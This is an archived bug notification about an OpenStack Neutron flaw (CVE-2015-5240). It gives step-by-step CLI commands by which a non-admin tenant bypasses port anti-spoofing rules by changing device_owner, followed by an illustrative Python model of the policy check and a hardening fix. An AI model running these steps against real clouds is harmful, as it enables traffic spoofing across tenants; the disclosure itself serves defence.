
yahoo-eng-team team mailing list archive

[Bug 1417791] Re: Neutron allows non-admin user to circumvent port security via port-update device_owner


*** This bug is a duplicate of bug 1489111 ***
    https://bugs.launchpad.net/bugs/1489111

Thanks for filing this. This was actually a vulnerability fixed later in
bug 1489111. I think the part that was overlooked was that this could be
done on shared networks.

** This bug has been marked a duplicate of bug 1489111
   [OSSA 2015-018] IP, MAC, and DHCP spoofing rules can be bypassed by changing device_owner (CVE-2015-5240)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1417791

Title:
  Neutron allows non-admin user to circumvent port security via port-update device_owner

Status in neutron:
  New
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Neutron allows a non-admin tenant to circumvent and spoof port
  security by updating the device-owner to 'network:None' and rebooting
  the instance.

  How to reproduce:

  1. Create a new tenant: `keystone tenant-create --name demo --enable=true`
  2. Create a new user in that tenant: `keystone user-create --name demo --tenant $TENANT_ID --pass $PASSWORD --enabled true`
  3. Switch to that new user: `export OS_USERNAME=demo; export OS_TENANT_NAME=demo; export OS_PASSWORD=$PASSWORD`
  4. Create a keypair: `nova keypair-add demo-key --pub-key ~/.ssh/authorized_keys`
  5. Create a security group: `neutron security-group-create demo-secgroup`
  6. Add a permit rule to that security group: `neutron security-group-rule-create demo-secgroup --remote-ip-prefix 0.0.0.0/0`
  7. Deploy a new instance: `nova boot --flavor m1.tiny --image ubuntu-14.04 --nic net-id=$NETWORK_ID --key-name demo-key --security-groups demo-secgroup --poll demo-instance`
  8. Find the instance's neutron port: `neutron port-list`
  9. Update neutron port device owner: `neutron port-update $PORT_ID --device_owner network:None`
  10. Verify neutron port device owner updated: `neutron port-show $PORT_ID`
  11. Reboot instance: `nova reboot $INSTANCE_ID`

  When the instance comes back up, it will not have anti-spoofing port
  security rules present and can source traffic from any IP and MAC
  combination.

  It doesn't appear that this was intended; in Juno the stock neutron/policy.conf includes:
  ```
      "update_port": "rule:admin_or_owner",
      "update_port:port_security_enabled": "rule:admin_or_network_owner",
  ```

  But the port owner is permitted to modify the device-owner attribute
  of the port which allows circumventing the port security.

  I would recommend protecting the device_owner and device_id port
  attributes so they can only be modified by an admin user.
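Added example (not Neutron's code, and not the fix shipped for bug 1489111): a toy model of how attribute-level policy.json rules are evaluated, showing why the Juno rules quoted above let a port owner change device_owner, and how the attribute rules the reporter recommends would close that path. The rule names mirror stock policy.json; the evaluation engine, the port record and the contexts are constructed for illustration.

```python
# Toy model of policy.json enforcement (hypothetical, not oslo.policy).
# Rule names match stock Neutron policy.json; the engine is simplified:
# a value "rule:NAME" is resolved by looking up NAME, a callable is a
# generic check taking (context, target).

JUNO_RULES = {
    "admin_or_owner": lambda ctx, t: (
        ctx["is_admin"] or ctx["tenant_id"] == t["tenant_id"]),
    "admin_or_network_owner": lambda ctx, t: (
        ctx["is_admin"] or ctx["tenant_id"] == t["network_tenant_id"]),
    "admin_only": lambda ctx, t: ctx["is_admin"],
    # The two lines quoted from the Juno policy.conf above.
    "update_port": "rule:admin_or_owner",
    "update_port:port_security_enabled": "rule:admin_or_network_owner",
}

# Hardened variant: the reporter's recommendation expressed as
# attribute-level rules on device_owner and device_id.
HARDENED_RULES = dict(JUNO_RULES)
HARDENED_RULES["update_port:device_owner"] = "rule:admin_only"
HARDENED_RULES["update_port:device_id"] = "rule:admin_only"

def _check(rules, name, ctx, target):
    rule = rules[name]
    if callable(rule):
        return rule(ctx, target)
    return _check(rules, rule.split(":", 1)[1], ctx, target)

def port_update_allowed(rules, ctx, port, body):
    """True if ctx may apply `body` to `port` under `rules`.

    As with oslo.policy, an 'action:attribute' rule is consulted only
    for attributes actually present in the request body, so an
    attribute with no rule of its own is governed by the base action.
    """
    if not _check(rules, "update_port", ctx, port):
        return False
    for attr in body:
        key = "update_port:" + attr
        if key in rules and not _check(rules, key, ctx, port):
            return False
    return True

# Constructed sample: a demo tenant's instance port on a shared network
# owned by the admin tenant, and the update from step 9 above.
PORT = {"tenant_id": "demo", "network_tenant_id": "admin",
        "device_owner": "compute:nova"}
DEMO = {"is_admin": False, "tenant_id": "demo"}
ADMIN = {"is_admin": True, "tenant_id": "admin"}
SPOOF_BODY = {"device_owner": "network:None"}

if __name__ == "__main__":
    print(port_update_allowed(JUNO_RULES, DEMO, PORT, SPOOF_BODY))      # True
    print(port_update_allowed(HARDENED_RULES, DEMO, PORT, SPOOF_BODY))  # False
    print(port_update_allowed(HARDENED_RULES, ADMIN, PORT, SPOOF_BODY)) # True
```

Any service that sets device_owner or device_id on a tenant's port using a non-admin token would also be blocked by such a rule, so check the compute service's Neutron client configuration before deploying it.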

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1417791/+subscriptions